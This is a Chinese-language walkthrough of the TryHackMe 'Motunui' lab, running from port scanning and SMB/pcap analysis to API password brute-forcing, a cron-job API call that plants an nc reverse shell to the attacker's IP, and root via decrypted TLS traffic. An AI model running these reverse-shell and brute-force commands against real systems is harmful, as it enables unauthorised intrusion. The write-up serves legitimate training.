打靶记录(六三)之THMMotunui

端口扫描

sudo nmap --min-rate 10000 -p- 10.10.201.190
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 03:43 UTC
Nmap scan report for 10.10.201.190
Host is up (0.38s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3000/tcp open  ppp
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 22.91 seconds

sudo nmap -sT -sV -sC -O -p22,80,139,445,3000,5000 10.10.201.190                                 
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 03:44 UTC
Nmap scan report for 10.10.201.190
Host is up (0.25s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:f4:43:ac:39:fe:94:13:7a:ad:3d:e6:5f:b4:7e:71 (RSA)
|   256 49:8c:75:e1:78:e9:72:65:de:c9:14:74:0f:d4:1a:81 (ECDSA)
|_  256 0b:b6:27:f9:ad:ed:22:a9:90:ac:9e:b3:85:1b:aa:96 (ED25519)
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  ���l�U      Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
3000/tcp open  ppp?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 174
|     Date: Mon, 04 Dec 2023 03:44:35 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /nice%20ports%2C/Tri%6Eity.txt%2ebak</pre>
|     </body>
|     </html>
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 139
|     Date: Mon, 04 Dec 2023 03:44:28 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /</pre>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Date: Mon, 04 Dec 2023 03:44:30 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>
5000/tcp open  ssl/http    Node.js (Express middleware)
| tls-nextprotoneg: 
|   http/1.1
|_  http/1.0
| ssl-cert: Subject: organizationName=Motunui/stateOrProvinceName=Motunui/countryName=GB
| Not valid before: 2020-08-03T14:58:59
|_Not valid after:  2021-08-03T14:58:59
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94%I=7%D=12/4%Time=656D4B1D%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Poli
SF:cy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20139\r
SF:\nDate:\x20Mon,\x2004\x20Dec\x202023\x2003:44:28\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<met
SF:a\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Ca
SF:nnot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HTTPOptions,16C,"HTTP/1\
SF:.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x2
SF:0'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/
SF:html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Mon,\x2004
SF:\x20Dec\x202023\x2003:44:30\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOC
SF:TYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"utf-8\
SF:">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x20/<
SF:/pre>\n</body>\n</html>\n")%r(FourOhFourRequest,18B,"HTTP/1\.1\x20404\x
SF:20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x20'none'\r\n
SF:X-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20ch
SF:arset=utf-8\r\nContent-Length:\x20174\r\nDate:\x20Mon,\x2004\x20Dec\x20
SF:2023\x2003:44:35\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20htm
SF:l>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>
SF:Error</title>\n</head>\n<body>\n<pre>Cannot\x20GET\x20/nice%20ports%2C/
SF:Tri%6Eity\.txt%2ebak</pre>\n</body>\n</html>\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: MOTUNUI; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: motunui
|   NetBIOS computer name: MOTUNUI\x00
|   Domain name: \x00
|   FQDN: motunui
|_  System time: 2023-12-04T03:45:02+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-12-04T03:45:01
|_  start_date: N/A
|_nbstat: NetBIOS name: MOTUNUI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 1s, median: 0s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.57 seconds

SMB枚举

smbmap -H 10.10.201.190

得到一个traces共享目录

smbclient //10.10.201.190/traces

发现有一堆流量包，但只有maui的有用，下载下来。wireshark打开，但是发现都是大多都是加密后的流量。有一条http流量非常可疑，是一张图片，导出发现给了一个URL:d3v3lopm3nt.motunui.thm，添加进hosts

Web

访问发现是apache的默认目录，同时扫一下还有没有别的子域

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://motunui.thm' -H 'HOST:FUZZ.motunui.thm' -fs 10918

看样子是没有，访问之前找到的子域

显示是给开发人员的

扫一下目录，有一个docs，访问得到一个README.md

# Documentation for the in-development API

##### [Changelog](CHANGELOG.md) | [Issues](ISSUES.md)

Please do not distribute this documentation outside of the development team.

## Routes

Find all of the routes [here](ROUTES.md).

发现还有三个.md文件，在docs中全部下载下来

然而只有routes有内容

# Routes

The base URL for the api is `api.motunui.thm:3000/v2/`.

### `POST /login`

Returns the hash for the specified user to be used for authorisation.

#### Parameters

- `username`
- `password`

#### Response (200)

​```js
{
	"hash": String()
}
​```

#### Response (401)

​```js
{
	"error": "invalid credentials"
}
​```

### 🔐 `GET /jobs`

Returns all the cron jobs running as the current user.

#### Parameters

- `hash`

#### Response (200)

​```js
{
	"jobs": Array()
}
​```

#### Response (403)

​```js
{
	"error": "you are unauthorised to view this resource"
}
​```

### 🔐 `POST /jobs`

Creates a new cron job running as the current user.

#### Parameters

- `hash`

#### Response (201)

​```js
{
	"job": String()
}
​```

#### Response (401)

​```js
{
	"error": "you are unauthorised to view this resource"
}
​```

Gethell

得到另一个子域，添加进hosts

似乎存在login，和jobs两个路由，但是需要用户和密码。目前没有任何信息

查看v1的API版本时，在POST请求login时，让我们用maui来登录。也许可以爆破密码

ffuf -w /usr/share/wordlists/rockyou.txt -u 'http://api.motunui.thm:3000/v2/login' -H 'Content-Type: application/json' -d '{"username":"maui","password":"FUZZ"}' -fs 31

得到密码为island(用THM的kali速度就是快啊)

curl -H 'Content-Type: application/json' -d '{"username":"maui","password":"island"}' -XPOST http://api.motunui.thm:3000/v2/login

得到了{“hash”:”aXNsYW5k”}

curl -H 'Content-Type: application/json' -d '{"hash":"aXNsYW5k","job":"* * * * * rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.11.38.245 1234 >/tmp/f" }' -XPOST http://api.motunui.thm:3000/v2/jobs

新增一个crontab,写上反弹shell

提权

在moana用户家目录有个readme,让我们完成packet tracer的网络，并提示了不要密码重用，这是思科用于学习计算机网络的一款软件，文件的后缀为.pkt

find / -name "*.pkt" 2>/dev/null

在软件中打开，打开交换机的config，导出正在运行的配置，在其中找到moana的密码：H0wF4ri’LLG0

接着就是提权了，在/var/www目录还看到一个tls目录，其中有用于tls加密用的公私钥，以及这个网页所采用的nodejs脚本,并找到私钥的密码为Password1

想到之前在smb找到的那个流量包中有一对tls加密后的流量，但是奇怪的是我用了这个密钥直接提示出错，也许这是一个兔子洞

在/etc/中又找到一个ssl.txt,才知道原来ssl日志也可以用来解密

在wireshark中找到“编辑”->”首选项”->”协议”->”TLS”导入日志之后，发现多了好多http的流量，在其中找到root的密码：Pl3aseW0rk

碎碎念

又遇到了API，无非就是考察POST和JSON之类的，还是挺有趣的。有些地方脑洞还比较大的吧，得去了解一下SSL/TLS加密了